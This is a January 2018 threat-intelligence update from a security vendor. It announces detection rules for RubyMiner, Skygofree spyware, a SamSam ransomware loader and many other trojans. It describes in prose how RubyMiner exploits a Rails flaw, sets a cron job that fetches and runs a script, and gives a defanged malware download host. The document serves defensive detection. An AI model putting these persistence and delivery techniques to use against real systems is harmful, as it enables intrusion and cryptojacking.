Threat Intelligence and Cyber Threat Management (CTM) Protection Update for the 3rd week of January 2018

New Detection Technique – RubyMiner

RubyMiner is a new version of a Monero Coinminer family written in Ruby that exploits a known vulnerability in Ruby on Rails that allows remote code execution (CVE-2013-0156). The attacker sends a payload, encoded in base64, inside an HTTP POST request header. Unpatched servers are potentially vulnerable to RubyMiner.

The payload contains a script that adds a new entry in the crontab of the host. This job is executed once per hour and downloads a file named robots.txt via wget. The file robots.txt contains a shell script that checks if a coinminer is already in execution and, if not, downloads the malware from internetsearch[.]is/sshd and executes it.

We've added IDS signatures and the following correlation rule to detect this activity:

  • System Compromise, Trojan infection, RubyMiner

New Detection Technique – Skygofree

Skygofree is an Android spyware discovered in the wild in 2017, based on initial versions from 2014. The malware provides the ability to grab a lot of exfiltrated data, such as call records, text messages, geolocation, calendar events, surrounding audio, and other memory information. Also, it can steal WhatsApp messages via Accessibility Services and connect to Wi-Fi networks controlled by cybercriminals.

The malware is delivered inside malicious apps, downloaded from external providers. Attackers have the ability to control the implant via HTTP, XMPP, SMS, and FirebaseCloudMessaging. The latest version supports 48 different C&C commands, which can perform actions like killing idle services to guarantee resource availability, creating a rogue Wi-Fi with specific configuration, and controlling the camera.

We've added IDS signatures and the following correlation rule to detect this activity:

  • System Compromise, Trojan infection, Skygofree

New Detection Techniques – Trojan Infection

We've updated the following correlation rules as a result of additional recent malicious activity:

  • System Compromise, Trojan infection, Andariel Andarat
  • System Compromise, Trojan infection, CrimeScene
  • System Compromise, Trojan infection, Emrethob
  • System Compromise, Trojan infection, Plumb3rMiner
  • System Compromise, Trojan infection, QwertMiner
  • System Compromise, Trojan infection, SamMiner
  • System Compromise, Trojan infection, Sathurbot.AN
  • System Compromise, Trojan infection, Sverki
  • System Compromise, Trojan infection, VBS.ARS
  • System Compromise, Trojan infection, Win32.Drun
  • System Compromise, Trojan infection, XanaduMiner

New Detection Techniques

We've added the following correlation rules as a result of additional recent malicious activity:

  • Exploitation & Installation, Client Side Exploit - Known Vulnerability, BlackTDS Malicious Activity
  • Exploitation & Installation, Client Side Exploit - Known Vulnerability, MODX Revolution 2.5.6 Blind SQL Injection
  • Exploitation & Installation, Configuration Changed, Generic ADSL Router DNS Change Request
  • Exploitation & Installation, Suspicious Behaviour, Possible Belkin N600DB Wireless Router Request Forgery Attempt

Updated Detection Technique – SamSam

A new variant of SamSam ransomware was discovered in the wild in the first weeks for 2018. The new variant is deployed using a loader which decrypts and executes an encrypted ransomware payload, which represents an improvement in the anti-forensic methods used by the malware. It is believed that, similar to previous variants, the attacker should access the compromised machine manually in order to provide and execute the malware pieces.

There are no differences between the encryption mechanism used by this current SamSam variant compared to older versions. However, some string obfuscation (encrypting the strings with AES) and anti-analysis techniques have been added. During execution, the loader will find files with the extension .stubbin in its directory, which contains the SamSam encrypted .NET Assembly payload, which should be provided manually by the attacker. Symmetric encryption keys are randomly generated for each file. Later, the loader decrypts the payload with a password supplied as the first argument and executes it.

The attackers have received more than 30.5 BTC so far.

We've added IDS signatures and updated the following correlation rule to improve exploit kit detection:

  • System Compromise, Ransomware infection, SamSam

Updated Correlation Rules

We've updated the following correlation rules as a result of recent malicious activity:

  • Delivery & Attack, Malicious website, Phishing activity
  • Exploitation & Installation, Client Side Exploit - Known Vulnerability, HTA File containing Wscript.Shell Call
  • Reconnaissance & Probing, Configuration Changed, Master IP CAM 01 Unauthenticated Configuration Change (CVE-2018-5725)
  • System Compromise, C&C Communication, Meterpreter SSL Certificate
  • System Compromise, C&C Communication, Observed Malicious SSL Cert (MalDoc DL) SSL activity
  • System Compromise, Malware infection, CoinMiner
  • System Compromise, Malware infection, Suspicious connections to a Dynamic DNS domain
  • System Compromise, Malware RAT, Remcos/Remvio
  • System Compromise, Trojan infection, AgentTesla
  • System Compromise, Trojan infection, Banker
  • System Compromise, Trojan infection, dnsd
  • System Compromise, Trojan infection, Generic PowerShell
  • System Compromise, Trojan infection, Kryptik
  • System Compromise, Trojan infection, Rodecap
  • System Compromise, Trojan infection, Unknown trojan
  • System Compromise, Trojan infection, Windows Mirai